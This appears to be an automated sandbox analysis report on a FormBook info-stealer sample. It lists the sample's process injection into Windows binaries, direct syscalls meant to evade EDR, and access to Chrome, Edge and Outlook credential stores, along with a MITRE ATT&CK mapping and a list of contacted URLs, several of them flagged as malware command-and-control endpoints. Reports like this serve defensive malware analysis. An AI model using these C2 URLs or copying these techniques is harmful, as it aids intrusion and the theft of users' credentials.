Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]	2_2_0325EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]	2_2_032E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]	2_2_03232F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]	2_2_0326CF1F

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E781F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00E781F7

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00E4A395
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4A364 SetUnhandledExceptionFilter,		0_2_00E4A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\DevicePairingWizard.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Thread register set: target process: 2924

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Thread APC queued: target process: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2694008

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E78C93 LogonUserW,

0_2_00E78C93

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E23B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E23B4C

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E24A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00E24A35

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E84EF5 mouse_event,

0_2_00E84EF5

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe"	Jump to behavior
Source: C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

0_2_00E781F7

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E84C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00E84C03

Source: LisectAVT_2403002B_466.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ljryBmFNsYlm.exe, 00000003.00000002.4470743839.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000000.2124881890.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471162967.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: LisectAVT_2403002B_466.exe, ljryBmFNsYlm.exe, 00000003.00000002.4470743839.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000000.2124881890.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471162967.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ljryBmFNsYlm.exe, 00000003.00000002.4470743839.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000000.2124881890.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471162967.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ljryBmFNsYlm.exe, 00000003.00000002.4470743839.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000000.2124881890.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471162967.0000000001A21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E4886B cpuid

0_2_00E4886B

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E550D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00E550D7

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E62230 GetUserNameW,

0_2_00E62230

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E5418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00E5418A

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E24AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E24AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_81
Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_XP
Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_XPe
Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_VISTA
Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_7
Source: LisectAVT_2403002B_466.exe	Binary or memory string: WIN_8
Source: LisectAVT_2403002B_466.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E96596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00E96596
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E96A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00E96A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_466.exe	100%	Avira	TR/AD.ShellcodeCrypter.iagdu

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.piensasolutions.com/ssl?utm_source=parking&utm_medium=link&utm_campaign=correo	0%	Avira URL Cloud	safe
https://piensasolutions.com/css/parking2.css	0%	Avira URL Cloud	safe
http://www.techstone.top/d5fo/?7b7D=ZtxaWCYYlalaBLbUZEg6r6j4osC8kpYtaMEhijkB8H2iy1ANSqSP0R6JXlSUbXLuwPWrlga8EoblOOmZuDHqStQkZ0ENq5OQUfKh4Zv5agv6mVk/8VHvrdHyJdoKzVeyYg==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
http://lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKA	0%	Avira URL Cloud	safe
http://www.lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKAL9A3qPLxSgX4nFFBMT0Qr3C3Mt9G1yNIIz6WxytSSBQEHhhuhnAxkZUHOGfulFQA==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
http://www.primerpaintjobs.com/d5fo/	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-desplegar.jpg	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.pandafitnessboo.com/d5fo/	100%	Avira URL Cloud	malware
http://www.pandafitnessboo.com/d5fo/?7b7D=ZpdAgvspmy+hTWfIGO3yX+xvrXsAMei4bBOt8BxrswmHE1awNdipNiT+j4hdfFyjFWMSgEHKkrcEvKgvyxqjFaD+81oW/DCEN2Oo1sUO/kySitSS9PIrivUN0n61HzGWTA==&jlx=Zd48SBF0d	100%	Avira URL Cloud	malware
http://www.bieniastest.xyz/d5fo/?7b7D=LMFtkAbNwZ2elB2GqME+IyQxX7DpzdHWKaIeqICYjgo7Pf7uTIFX4zBwXYBOYcYwGUmItxrSVLCWdjm98wNi/v/M/fTrXywXbqzKp2nVAwJXJwrN8i8cZj3fKe75XwP3Sw==&jlx=Zd48SBF0d	100%	Avira URL Cloud	malware
http://www.bieniastest.xyz/d5fo/	100%	Avira URL Cloud	malware
https://www.piensasolutions.com/certificado-ssl?utm_source=parking&utm_medium=link&utm_campa	0%	Avira URL Cloud	safe
http://www.anuts.top/d5fo/	0%	Avira URL Cloud	safe
http://www.fwbkl.com/d5fo/	0%	Avira URL Cloud	safe
http://www.gacorslot188.com/d5fo/?7b7D=YgMsgDJtCOjfJyENf6IYVB+j8nyLj4HpaTgxuJv8edncauxSuygt96U33iQCFym5FChTcLDhuwePnMBbbjdGUumEJzbp4n/EDj2Sbs8WnSMUCI3AXWDzfQLO1NjL1mG45A==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
http://www.gacorslot188.com/d5fo/	0%	Avira URL Cloud	safe
http://www.searchvity.com/?dn=	0%	Avira URL Cloud	safe
http://www.primerpaintjobs.com/d5fo/?7b7D=AHzm4ye+5PiW8EK3Xc8yvQbL0W8b+QDjDz3KJBw+soEJlA3iHdW1FHFMZKYf54FvxwKLR/ceGHi29plUOxZKTvSK+yeJiXyyL9T50uSOcXQBWH3FsDfUfLjchgLwvE1adw==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=we	0%	Avira URL Cloud	safe
https://www.piensasolutions.com?utm_source=parking&utm_medium=link&utm_campaign=piensa	0%	Avira URL Cloud	safe
http://www.energysecrets.online/d5fo/	100%	Avira URL Cloud	malware
http://www.techstone.top/d5fo/	0%	Avira URL Cloud	safe
http://www.bitmapsportsbook.com/d5fo/	0%	Avira URL Cloud	safe
https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&utm_medium=link&utm_camp	0%	Avira URL Cloud	safe
https://www.namecheap.com/domains/registration/results/?domain=bieniastest.xyz	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-ssl-parking.png	0%	Avira URL Cloud	safe
http://www.biotecnology.org/d5fo/?7b7D=Y250bjw/Eb4JaDsvBgJQoO5DcTGKRg2TY8WwpeWRYSxf0AM6NgGJQ+gzPFJsrW2WCqa86REIjEj/npni0ixUVU6cRhsYsQ6/GuFWj4cc/ehEtPjcsd8gcWhpaBoMEh18pg==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://plus.google.com/u/0/102310483732773374239	0%	Avira URL Cloud	safe
http://www.anuts.top/d5fo/?7b7D=UorOUJsNhtzOpcbW6pRD7y2oLw3yU53b7AktnJqWMfC1hZfMFH0XzXkRJ4yWQIlKeaDAqwcN0the3qftPUt4DeI9smIFWq5tw4RBCGM6pKiUjuqW8ii8RfKWeFMpWQWMaw==&jlx=Zd48SBF0d	0%	Avira URL Cloud	safe
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-hosting.png	0%	Avira URL Cloud	safe
https://piensasolutions.com/imgs/parking/icon-web.png	0%	Avira URL Cloud	safe
